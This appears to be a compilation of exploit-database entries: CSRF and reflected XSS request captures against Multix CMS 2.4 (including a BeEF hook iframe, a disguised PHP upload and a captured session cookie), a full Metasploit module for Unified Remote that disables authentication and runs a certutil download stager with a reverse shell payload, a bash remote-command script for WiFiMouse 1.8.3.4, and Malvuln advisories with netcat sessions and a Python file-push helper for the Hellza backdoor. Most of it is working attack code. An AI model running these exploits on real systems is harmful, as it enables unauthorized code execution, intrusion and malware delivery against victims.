<pre><code># Exploit Title: Multix - Multipurpose Website CMS with Codeigniter Cross Site Request Forgery<br /># Exploit Author: th3d1gger<br /># Vendor Homepage: https://codecanyon.net<br /># Software Link: https://codecanyon.net/item/multix-multipurpose-website-cms-with-codeigniter/23537596<br /># Version: Version 2.4<br /># Tested on Ubuntu 18.04<br /><br /><br />-------Request (browser capture of the admin file-upload POST; the multipart body carries only file_title, file_name and form1 and no anti-CSRF token, which is the basis of the finding. The cross-origin auto-submitting form that would actually exercise the CSRF is not included: the Origin, Referer and Sec-Fetch-Site headers below are all same-origin. The iframe in file_title and the "shell2.php .jpg" filename appear to be additional probes against the same endpoint rather than part of the CSRF itself)-----------<br />POST /admin/file/add HTTP/1.1<br />Host: localhost<br />Content-Length: 466<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"<br />Origin: http://localhost<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE0mBtYGic6umB5Ve<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/admin/file/add<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: allow=1;<br />Connection: close<br /><br />------WebKitFormBoundaryE0mBtYGic6umB5Ve<br />Content-Disposition: form-data; name="file_title"<br /><br /><iframe src="http://local.proxy:3000/?url=http://localhost/beefhook.html"></iframe><br />------WebKitFormBoundaryE0mBtYGic6umB5Ve<br />Content-Disposition: form-data; name="file_name"; filename="shell2.php .jpg"<br />Content-Type: image<br /><br />asdasd<br />------WebKitFormBoundaryE0mBtYGic6umB5Ve<br />Content-Disposition: form-data; name="form1"<br /><br /><br />------WebKitFormBoundaryE0mBtYGic6umB5Ve--<br /></code></pre>
<pre><code># Exploit Title: Multix - Multipurpose Website CMS with Codeigniter Reflected Cross Site Scripting<br /># Exploit Author: th3d1gger<br /># Vendor Homepage: https://codecanyon.net<br /># Software Link: https://codecanyon.net/item/multix-multipurpose-website-cms-with-codeigniter/23537596<br /># Version: Version 2.4<br /># Tested on Ubuntu 18.04<br /><br /><br />-------Request (reflected XSS through the search_string POST parameter of /search; the payload separates details / open / onToGgle with %0a newlines instead of spaces and uses mixed case, i.e. it is shaped to slip past a naive tag and attribute blacklist, and fires via ontoggle on an auto-opened details element. The Cookie header below is the author's captured session state - ci_session plus a remember_web_* token - and should be treated as sensitive; whether /search is reachable without it is not shown here)-----------<br />POST /search HTTP/1.1<br />Host: localhost<br />Content-Length: 24<br />Cache-Control: max-age=0<br />sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"<br />Origin: http://localhost<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36<br />Content-Type: application/x-www-form-urlencoded<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/search<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlRwa1o2cDhxRGtqTUxKL2tLS0NiVGc9PSIsInZhbHVlIjoiajVqT2VOeTk5RmVXY20yaG44ekFQbTc4OFZ3K2EvbThhTFFVUjBzdVpZNmtDQVlocndZU1pEeWFlaURPWDl3V2JsZGFxeDYyR1NWRGoyVHRDYW9iVExUck12NTNjVHZ3VWF2eHNWN1dScXNRdW81ZUNPeldnZ2FRdHVxODlsWnI1cDhWOEcvQlZWSi83VEM5WTJNNC9CME5PWVVyU2dDNWhNcUlvSXU1UWlsQjF2eTYxdmQ2aW5EZHNkYVBQMUpObEN2aFp6Y0tvUkhrUkFac0ZveURZZ0NFMHlPWjRYYSs0eTNTR3VPVXZUMD0iLCJtYWMiOiJjYmU1ZWYxODJlZjYyNzAyODI5YjM4NWEzMDgyYWFkMzA2YmIzOWM3ODA3ZjgyNjMzZWRjMDc3MDkxNWEzZGQ3In0%3D; ci_session=b3568d851b75f1b0191447e7b8ba35860e8c8e56; twk_idm_key=-J__vZrlSOiy2FYLE4Fsu; TawkConnectionTime=0; 
twk_uuid_5a7c31ded7591465c7077c48=%7B%22uuid%22%3A%221.AGEpC4jGGoH2T6v2QAlePuWJRFfI9oZIu0RUbaNluAgJJzDJQ1zFcS1Fv9uH7mP6PIgcXCE6JVCXLF7JZsX0kHOsQNihqwO81D79ESmlYkVwYf5UHnjWKkJkiJPYK7Dn%22%2C%22version%22%3A3%2C%22domain%22%3Anull%2C%22ts%22%3A1663795200266%7D<br />Connection: close<br /><br />search_string=<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>&form1=<br /><br /></code></pre>
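##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Exploit::Remote::Tcp
  # attempted cmdstger, however there was so much sleep involved for the screen to clear the buffer
  # that it was going to take hours. The buffer would also overrun itself and the exploit would fail
  # if not enough sleep time was used. it was a nightmare, not for this exploit.
  # include Msf::Exploit::CmdStager
  include Exploit::EXE # generate_payload_exe
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Unified Remote Auth Bypass to RCE',
        'Description' => %q{
          This module utilizes the Unified Remote remote control protocol to type out and
          deploy a payload. The remote control protocol can be configured to have no passwords,
          a group password, or individual user accounts. If the web page is accessible, the
          access control is set to no password for exploitation, then reverted.
          If the web page is not accessible, exploitation will be tried blindly.
          This module has been successfully tested against version 3.11.0.2483 (50) on Windows 10.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
          'H4RK3NZ0' # edb
        ],
        'References' => [
          [ 'EDB', '49587' ],
          [ 'URL', 'https://www.unifiedremote.com/' ],
          [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/unified%20remote/unified-remote-rce.py' ],
          [ 'CVE', '2022-3229' ]
        ],
        'Arch' => [ ARCH_X64, ARCH_X86 ],
        'Platform' => 'win',
        'Stance' => Msf::Exploit::Stance::Aggressive,
        'Targets' => [
          ['pull', {}],
        ],
        'Payload' => {
          'BadChars' => "\x0a\x00"
        },
        'DefaultOptions' => {
          # since this may get typed out ON SCREEN we want as small a payload as possible
          'PAYLOAD' => 'windows/shell/reverse_tcp'
        },
        'DisclosureDate' => '2021-02-25',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [SCREEN_EFFECTS, ARTIFACTS_ON_DISK] # typing on screen
        }
      )
    )
    register_options(
      [
        OptPort.new('RPORT', [true, 'Port Unified Remote runs on', 9512]),
        OptPort.new('WEBSERVER', [true, 'Port Unified Remote web server runs on', 9510]),
        OptInt.new('SLEEP', [true, 'How long to sleep between commands', 1]),
        OptString.new('PATH', [true, 'Where to stage payload for pull method', 'c:\\Windows\\Temp\\']),
        OptString.new('CLIENTNAME', [false, 'Name of client, this shows up in the logs', '']),
        OptBool.new('VISIBLE', [false, 'Make exploitation visible to the user', false]),
      ]
    )
  end

  #############################################
  # Key names understood by the Relmtech.Keyboard layout
  #############################################

  def win_key
    'LWIN' # 4c57494e
  end

  def ret_key
    'RETURN' # 52455455524e
  end

  def space_key
    'SPACE' # 5350414345
  end

  # PATH option normalised to always end in a backslash so a filename can be appended.
  def path
    return datastore['PATH'] if datastore['PATH'].end_with? '\\'

    "#{datastore['PATH']}\\"
  end

  #############################################
  # Framing
  #############################################

  # 4-byte message prefix: two zero bytes, then the body length as a big-endian
  # 16-bit count (the protocol never needs more than that here).
  def string_header_one(length)
    string_header_one = "\x00\x00"
    string_header_one << [length].pack('n').to_s
  end

  # Wrap a message body in its length prefix. bytesize rather than length:
  # the Unified.Command 'Hash' field carries non-ASCII bytes and the server
  # expects a byte count (0x5e for that message, per the captured header).
  def frame(body)
    "#{string_header_one(body.bytesize)}#{body}"
  end

  # Push one framed message to the protocol socket and wait SLEEP seconds so
  # the server has processed it before the next one arrives.
  def send_framed(body)
    sock.put(frame(body))
    sleep(datastore['SLEEP'])
  end

  #############################################
  # Handshake / authentication packets
  #############################################

  # First message on the control socket. The length prefix is computed rather
  # than hard-coded (0x85 in the original capture) so a CLIENTNAME of any
  # length still frames correctly; the default 24-char name yields 0x85.
  def initialize_packet
    body = [
      "\x00\x01\x08",
      "Action\x00", # 416374696f6e 00
      "\x00\x05",
      "Password\x00", # 50617373776f7264 00
      '8e8133b3-a18b-43af-a7cd-e04f747827ce', # seems to be a default
      "\x00\x05",
      "Platform\x00", # 506c6174666f726d 00
      "android\x00", # 616e64726f6964 00
      "\x08",
      "Request\x00", # 52657175657374 00
      "\x00\x05",
      "Source\x00", # 536f7572636500
      "#{@client_name}\x00", # this value shows up in the server logs as who connected
      "\x03",
      "Version\x00", # 56657273696f6e 00
      "\x00\x00\x00\x0a\x00"
    ].join
    frame(body)
  end

  # Capabilities + authentication message sent with the (apparently default)
  # password hash; with security mode 'none' this is accepted as-is.
  # Original capture framed this as 0xc8 bytes; computed here for the same reason as above.
  def empty_authentication
    body = [
      "\x00\x01\x08",
      "Action\x00", # 416374696f6e 00
      "\x01\x02",
      "Capabilities\x00", # 4361706162696c6974696573 00
      "\x04",
      "Actions\x00", # 416374696f6e73 00
      "\x01\x04",
      "Encryption2\x00", # 456e6372797074696f6e32 00
      "\x01\x04",
      "Fast\x00", # 46617374 00
      "\x00\x04",
      "Grid\x00", # 47726964 00
      "\x01\x04",
      "Loading\x00", # 4c6f6164696e6700
      "\x01\x04",
      "Sync\x00", # 53796e6300
      "\x01\x00\x05",
      "Password\x00", # 50617373776f7264 00
      'd634c1dcfdeb8735608a4a104ded4076de766dd61443619809ad7f35858d4492', # seems to be a default
      "\x00\x08",
      "Request\x00", # 52657175657374 00
      "\x01\x05",
      "Source\x00", # 536f7572636500
      "#{@client_name}\x00", # this value shows up in the server logs as who connected
      "\x00"
    ].join
    body
  end

  #############################################
  # These methods/packets are for visible mode (Relmtech.Keyboard layout)
  #############################################

  def string_header_two
    [
      "\x00\x01\x08",
      "Action\x00", # 416374696f6e 00
      "\x07\x05",
      "ID\x00", # 4944 00
      "Relmtech.Keyboard\x00", # 52656c6d746563682e4b6579626f617264 00
      "\x02",
      "Layout\x00", # 4c61796f7574 00
      "\x06",
      "Controls\x00", # 436f6e74726f6c73 00
      "\x02\x00\x02",
      "OnAction\x00", # 4f6e416374696f6e 00
      "\x02",
      "Extras\x00", # 457874726173 00
      "\x06",
      "Values\x00", # 56616c756573 00
      "\x02\x00\x05",
      "Value\x00" # 56616c7565 00
    ].join
  end

  def string_header_three
    [
      "\x00\x00\x00\x00\x05",
      "Name\x00", # 4e616d65 00
      "toggle\x00", # 746f67676c65 00
      "\x00\x08",
      "Type\x00", # 54797065 00
      "\x08\x00\x00\x00\x08",
      "Request\x00", # 52657175657374 00
      "\x07\x02",
      "Run\x00", # 52756e 00
      "\x02",
      "Extras\x00", # 457874726173 00
      "\x06",
      "Values\x00", # 56616c756573 00
      "\x02\x00\x05",
      "Value\x00" # 56616c7565 00
    ].join
  end

  def string_footer
    [
      "\x00\x00\x00\x00\x05",
      "Name\x00", # 4e616d65 00
      "toggle\x00", # 746f67676c65 00
      "\x00\x05",
      "Source\x00", # 536f75726365 00
      "#{@client_name}\x00", # this value shows up in the server logs as who connected
      "\x00"
    ].join
  end

  # Body of a keyboard 'toggle' action for one key name (the key appears twice).
  def keyboard_toggle(key)
    "#{string_header_two}#{key}#{string_header_three}#{key}#{string_footer}"
  end

  # Type one key on the target. A literal space is translated to the SPACE key
  # name; any other single character or key name (LWIN, RETURN, ...) is sent as-is.
  # No SLEEP here, the caller paces the keystrokes.
  def send_key(key, press_return: false)
    key = space_key if key == ' '
    sock.put(frame(keyboard_toggle(key)))
    sock.put(frame(keyboard_toggle(ret_key))) if press_return
  end

  # Type a whole string one character at a time.
  def type_text(text)
    text.each_char { |letter| send_key(letter) }
  end

  ##############################################
  # These methods/packets are for invisible mode (Unified.Command layout)
  ##############################################

  def load_unified_command
    # header: 00 00 00 5e
    [
      "\x00\x01\x08",
      "Action\x00", # 416374696f6e 00
      "\x03\x05", # changed from the previous one from 07 to 03
      "ID\x00", # 4944 00
      "Unified.Command\x00", # 556e69666965642e436f6d6d616e64 00
      "\x02",
      "Layout\x00", # 4c61796f7574 00
      "\x03",
      "Hash\x00", # 48617368 00
      "\x9e\xd0\x99:\x00", # 9ed0993a 00
      "\x08",
      "Request\x00", # 52657175657374 00
      "\x03\x05", # changed from the previous one from 07 to 03
      "Source\x00", # 536f7572636500
      "#{@client_name}\x00",
      "\x00"
    ].join
  end

  # 'update' action with an empty Text value: identical to add_content('').
  # Used once to create the script slot and once more at the end to clear it.
  def create_script
    # header: 00 00 00 e2
    add_content('')
  end

  def initialize_keyboard
    # header 00 00 00 4b
    [
      "\x00\x01\x08",
      "Action\x00", # 416374696f6e 00
      "\x05\x05",
      "ID\x00", # 4944 00
      "Unified.Command\x00", # 556e69666965642e436f6d6d616e64 00
      "\x08",
      "Request\x00", # 52657175657374 00
      "\x05\x05",
      "Source\x00", # 536f75726365 00
      "#{@client_name}\x00",
      "\x00"
    ].join
  end

  # 'update' action carrying +command+ as the Text value (it appears twice,
  # once under Action and once under Request). Header length is dynamic.
  def add_content(command)
    update_values = [
      "\x02",
      "Extras\x00", # 457874726173 00
      "\x06",
      "Values\x00", # 56616c756573 00
      "\x02\x00\x05",
      "Key\x00", # 4b6579 00
      "Text\x00", # 54657874 00
      "\x05",
      "Value\x00", # 56616c7565 00
      command,
      "\x00\x00\x00\x00\x05",
      "Name\x00", # 4e616d65 00
      "update\x00" # 757064617465 00
    ].join
    [
      "\x00\x01\x08",
      "Action\x00", # 416374696f6e 00
      "\x07\x05",
      "ID\x00", # 4944 00
      "Unified.Command\x00", # 556e69666965642e436f6d6d616e64 00
      "\x02",
      "Layout\x00", # 4c61796f7574 00
      "\x06",
      "Controls\x00", # 436f6e74726f6c73 00
      "\x02\x00\x02",
      "OnAction\x00", # 4f6e416374696f6e 00
      update_values,
      "\x00\x08",
      "Type\x00", # 54797065 00
      "\x08\x00\x00\x00\x08",
      "Request\x00", # 52657175657374 00
      "\x07\x02",
      "Run\x00", # 52756e 00
      update_values,
      "\x00\x05",
      "Source\x00", # 536f75726365 00
      "#{@client_name}\x00",
      "\x00"
    ].join
  end

  def execute_script
    # header 00 00 00 96
    [
      "\x00\x01\x08",
      "Action\x00", # 416374696f6e 00
      "\x07\x05",
      "ID\x00", # 4944 00
      "Unified.Command\x00", # 556e69666965642e436f6d6d616e64 00
      "\x02",
      "Layout\x00", # 4c61796f7574 00
      "\x06",
      "Controls\x00", # 436f6e74726f6c73 00
      "\x02\x00\x02",
      "OnAction\x00", # 4f6e416374696f6e 00
      "\x05",
      "Name\x00", # 4e616d65 00
      "execute\x00", # 65786563757465 00
      "\x00\x08",
      "Type\x00", # 54797065 00
      "\x08\x00\x00\x00\x08",
      "Request\x00", # 52657175657374 00
      "\x07\x02",
      "Run\x00", # 52756e 00
      "\x05",
      "Name\x00", # 4e616d65 00
      "execute\x00", # 65786563757465 00
      "\x00\x05",
      "Source\x00", # 536f75726365 00
      "#{@client_name}\x00",
      "\x00"
    ].join
  end

  #############################################
  # Payload web server
  #############################################

  # Serve the EXE to the certutil stager that the target is made to run.
  def on_request_uri(cli, _req)
    p = generate_payload_exe
    send_response(cli, p)
    print_good("Payload request received, sending #{p.length} bytes of payload for staging")
  end

  #############################################
  # Web interface (WEBSERVER port) helpers
  #############################################

  # Send one raw HTTP request to the web interface on a dedicated socket.
  # connect(false, ...) keeps it out of self.sock (the control protocol socket),
  # which also means a bare disconnect would never close it - hence the
  # explicit disconnect(http_sock) in the ensure.
  #
  # Returns the raw response, nil if nothing came back (timeout or the port is
  # unreachable - the module then falls back to a blind attempt, as the
  # description promises), or false if the server closed the connection first.
  def web_request(request, read: true)
    http_sock = connect(false, { 'RPORT' => datastore['WEBSERVER'].to_i })
    http_sock.put(request)
    return nil unless read

    http_sock.get_once(-1)
  rescue EOFError
    false
  rescue ::Rex::ConnectionError => e
    print_error("Web interface on port #{datastore['WEBSERVER']} not reachable: #{e.message}")
    nil
  ensure
    disconnect(http_sock) unless http_sock.nil?
  end

  def host_header
    "Host: #{datastore['RHOST']}:#{datastore['WEBSERVER']}\r\n"
  end

  # Ask the web interface to restart the service so an uploaded config takes effect.
  def restart_server
    web_request("GET /system/restart HTTP/1.1\r\n#{host_header}\r\n", read: false)
    print_status('Sleeping 5 seconds for server to restart')
    sleep(5)
  end

  # Upload +config+ (a Hash, as returned by get_config) and restart the server.
  # Returns nil without restarting if the server dropped the connection before
  # answering (same behaviour as the original EOFError path).
  def set_config(config)
    print_status('Uploading new server config')
    json = config.to_json
    request = "POST /system/config HTTP/1.1\r\n"
    request << host_header
    request << "Accept: application/json, text/javascript, */*; q=0.01\r\n"
    request << "Content-Type: application/json\r\n"
    request << "X-Requested-With: XMLHttpRequest\r\n"
    request << "Content-Length: #{json.length}\r\n"
    request << "\r\n"
    request << json

    res = web_request(request)
    return nil if res == false

    restart_server
  end

  # Fetch and parse the server config. Returns nil when the web interface is
  # unreachable, disabled (403), returns no body or returns invalid JSON; the
  # caller treats nil as "assume no authentication".
  def get_config
    print_status('Retrieving server config')
    res = web_request("GET /system/config HTTP/1.1\r\n#{host_header}\r\n")
    return nil unless res

    body = res.split("\r\n\r\n", 2)[1]
    return nil if body.nil?

    if body.include?('<h1>Forbidden (403)</h1>')
      print_error('Web interface is disabled. Unable to attempt bypass, assuming no authentication.')
      return nil
    end

    # transient error where the JSON doesn't fully receive maybe 1/15 tries in my testing
    JSON.parse(body)
  rescue JSON::ParserError
    nil
  end

  # Record an account from the config in the database (password unknown, the
  # config only exposes usernames and GUIDs).
  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      last_attempted_at: DateTime.now,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def check
    config = get_config
    if config.nil?
      return CheckCode::Unknown('Unable to get config from web server, unknown status of Unified Remote Controller')
    end

    # dig so a config without these sections reports Unknown instead of raising
    port = config.dig('interfaces', 'tcp', 'port')
    mode = config.dig('security', 'mode')
    if port.nil? || mode.nil?
      return CheckCode::Unknown('Config retrieved but it has no security/interfaces sections')
    end

    CheckCode::Vulnerable("Unified Remote is vulnerable on port #{port} with security mode '#{mode}' (can be bypassed, if needed)")
  end

  def exploit
    if datastore['CLIENTNAME'].blank?
      @client_name = "android-#{Rex::Text.rand_text_alphanumeric(16)}"
      print_status("Client name set to: #{@client_name}")
    else
      @client_name = datastore['CLIENTNAME']
    end

    # first grab the config from the HTTP server to determine if we need to disable auth
    security_mode = get_config
    reset_security_mode = nil
    unless security_mode.nil?
      security = security_mode['security']
      if security.nil?
        print_warning('Config has no security section, continuing as if no password is set')
      elsif security['mode'] == 'none'
        print_good('No security enabled')
      else
        print_status("#{security['mode']} mode enabled, password required, bypassing")
        reset_security_mode = security['mode']
        security['mode'] = 'none'
        set_config(security_mode)
      end
      # now that we have the config, check if theres any users, no passwords (theyre GUIDs)
      Array(security_mode.dig('security', 'users')).each do |account|
        print_good("Found account: #{account['username']}")
        report_cred(
          ip: rhost,
          port: rport,
          service_name: 'unified remote',
          user: account['username'],
          password: '',
          proof: account
        )
      end
    end

    begin
      deliver_payload
    ensure
      # Revert the auth bypass even if delivery raised: otherwise a failed run
      # would leave the target with security mode 'none'.
      unless reset_security_mode.nil?
        print_status('Reverting security mode')
        security_mode['security']['mode'] = reset_security_mode
        set_config(security_mode)
      end
    end
  end

  # Talk to the remote-control protocol: handshake, authentication, then hand
  # the certutil stager over either by typing it on screen (VISIBLE) or
  # through the hidden Unified.Command layout. Ends with handler + disconnect.
  def deliver_payload
    # start actually exploiting the rdp-ish server
    connect
    print_status('Sending handshake')
    sock.put(initialize_packet)
    sleep(datastore['SLEEP'])
    print_status('Sending empty authentication')
    sock.put(frame(empty_authentication))
    sleep(datastore['SLEEP'])

    filename = Rex::Text.rand_text_alphanumeric(rand(8..17)) + '.exe'
    target_file = "#{path}#{filename}"
    register_file_for_cleanup(target_file)
    # this method was in the original edb exploit, this is significantly faster
    # and speed is of the essence since remote user input most likely breaks this module
    stager = "certutil.exe -urlcache -f http://#{datastore['LHOST']}:#{datastore['SRVPORT']}/ #{target_file}"
    start_service('Path' => '/') # start webserver

    if datastore['VISIBLE']
      type_stager_on_screen(stager, target_file)
    else
      send_stager_hidden("#{stager} && #{target_file} && exit")
    end

    handler
    disconnect
    sleep(datastore['SLEEP'] * 2) # give time for it to do its thing before we revert
  end

  # VISIBLE mode: open the Start menu, launch cmd.exe, type the stager, then
  # type the path of the downloaded EXE so it runs.
  def type_stager_on_screen(stager, target_file)
    print_status('Opening Start Menu')
    # original exploit sent it twice, so we follow that
    send_key(win_key)
    send_key(win_key)
    sleep(datastore['SLEEP'])

    print_status('Opening command prompt')
    type_text('cmd.exe')
    send_key(ret_key)
    sleep(datastore['SLEEP'])

    print_status('Typing out payload')
    type_text(stager)
    send_key(ret_key)
    sleep(datastore['SLEEP'] * 2) # give time for it to save

    print_status('Attempting to open payload')
    type_text("#{target_file} && exit")
    send_key(ret_key)
  end

  # Invisible mode: load the Unified.Command layout, store +command+ in its
  # script slot, execute it, then clear the slot again.
  def send_stager_hidden(command)
    print_status('Loading Unified.Command')
    send_framed(load_unified_command)

    print_status('Updating Unified.Command')
    send_framed(create_script)
    send_framed(initialize_keyboard)

    print_status('Sending payload')
    send_framed(add_content(command))

    print_status('Executing script')
    send_framed(execute_script)
    send_framed(create_script)
  end
end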
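#!/bin/bash
# Exploit Title: WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)
# Date: 15-08-2022
# Author: Febin
# Vendor Homepage: http://necta.us/
# Software Link: http://wifimouse.necta.us/#download
# Version: 1.8.3.4
# Tested on: Windows 10
#
# The MouseServer listener on TCP/1978 accepts its line-based protocol from any
# client with no authentication: "key ..." lines inject key presses, "utf8 ..."
# lines inject typed text and "fileexplorer <path>" returns a directory
# listing. Option 1 presses Win+R, types "cmd /c <CMD>" and presses Enter;
# option 2 lists directories under the logged-on user's home.
# Needs socat (option 1) and nc + strings (option 2) on the attacker host.
# (Shebang moved to line 1 so the script can be executed directly.)

PORT=1978

banner() {
  printf '\n WiFiMouse / MouseServer 1.8.3.4 Exploit\n \n by FEBIN\n\n'
}

# Pipe the protocol lines for one command into the service. The one-second
# pauses keep the injected key events in order, as in the original PoC. The
# command is passed as a printf argument instead of being spliced into a
# second "sh -c" string, so quotes in it are not re-parsed locally.
rce() {
  local cmd
  printf '[*] Enter the Command to execute on the Target: '
  IFS= read -r cmd
  {
    echo 'key 9[R] WIN d'
    sleep 1
    echo 'key 9[R] WIN u'
    sleep 1
    printf 'utf8 cmd /c %s\n' "$cmd"
    sleep 1
    echo 'key 9[R] RTN u'
  } | socat - "TCP4:${TARGET}:${PORT}"
}

# Ask the service for a directory listing. The PoC drops the first byte of
# every returned line (cut -b 2-), presumably a record marker.
list_dir() {
  echo "fileexplorer $1" | nc "$TARGET" "$PORT" | strings | cut -b 2-
}

dirlist() {
  local dir
  echo "[*] User's Home Directory Contents:"
  list_dir '~/'
  # Loop until EOF (Ctrl-D). The original used "while $true", which only
  # worked because an unset $true expands to an empty, always-true command,
  # and never terminated once stdin was closed.
  while true; do
    printf '\nList Directory:> '
    IFS= read -r dir || return 0
    echo "[+] Contents of $dir: "
    list_dir "~/$dir"
  done
}

banner
printf '[*] Enter the Target IP Address: '
IFS= read -r TARGET
if [[ -z $TARGET ]]; then
  echo '[-] No target given!'
  exit 1
fi

printf '\n [1] Remote Command Execution\n [2] Directory Listing\n \n '
printf 'Enter Your Choice (1 or 2) : '
IFS= read -r CHOICE

case $CHOICE in
  1) rce ;;
  2) dirlist ;;
  *) echo '[-] Invalid Choice!' ;;
esac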
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/2cbd0fcf4d5fd5fb6c8014390efb0b21.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Hellza.120<br />Vulnerability: Unauthorized Remote Command Execution<br />Description: The malware listens on TCP ports 12122, 21. Third-party adversaries who can reach an infected system can connect to TCP/12122 with a plain TCP client and issue the backdoor's commands (F, L, D, E below); no authentication step appears in the session, the server just prints its version banner and accepts commands.<br />Family: Hellza<br />Type: PE32<br />MD5: 2cbd0fcf4d5fd5fb6c8014390efb0b21<br />Vuln ID: MVID-2022-0641<br />Dropped files: msdllsrv.exe<br />Disclosure: 09/19/2022 <br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 12122<br />xrR_Server version:1.20 Beta R1.1<br /><br />F (starts FTP if not running in case where the server was restarted)<br /><br />L (logger)<br />L15_ *0.00 KB*<br /><br />D (drives)<br />D 1C:\2D:\<br /><br />E (run file)<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/2cbd0fcf4d5fd5fb6c8014390efb0b21_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Hellza.120<br />Vulnerability: Authentication Bypass<br />Description: The malware listens on TCP ports 12122, 21. Third-party adversaries who can reach an infected system can log on to the FTP service on TCP/21 with any username/password combination (the session below authenticates as malvuln/malvuln). Intruders may then upload executables using ftp PASV, STOR commands.<br />Family: Hellza<br />Type: PE32<br />MD5: 2cbd0fcf4d5fd5fb6c8014390efb0b21<br />Vuln ID: MVID-2022-0642<br />Dropped files: msdllsrv.exe<br />Disclosure: 09/19/2022 <br /><br />Exploit/PoC (the FTP session below opens the passive data port 219*256+186 = 56250, which is what the Python helper connects to in order to push the file. Note that the helper reads the whole file with one f.read(), sends it once before the while loop and then sends the same buffer again inside the loop before the next f.read() returns b'', so the payload is transmitted twice; drop the s.send(EXE) that precedes the loop):<br />C:\>nc64.exe 192.168.18.125 21<br />220 HellzAddiction FTP server.<br />USER malvuln<br />331 Password required for malvuln.<br />PASS malvuln<br />230 User malvuln logged in.<br />SYST<br />215 UNIX Type: L8 Internet Component Suite<br />PASV<br />227 Entering Passive Mode (192,168,18,125,219,186).<br />CDUP \<br />250 CWD command successful. "C:/" is current directory.<br />STOR DOOM_SM.exe<br />150 Opening data connection for DOOM_SM.exe.<br />226 File received ok<br /><br />from socket import *<br /><br />MALWARE_HOST="192.168.18.125"<br />PORT=56250<br />DOOM="DOOM_SM.exe"<br /><br />def doit():<br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> f = open(DOOM, "rb")<br /> EXE = f.read()<br /> s.send(EXE)<br /><br /> while EXE:<br /> s.send(EXE)<br /> EXE=f.read()<br /><br /> s.close()<br /><br /> print("By Malvuln");<br /><br />if __name__=="__main__":<br /> doit()<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
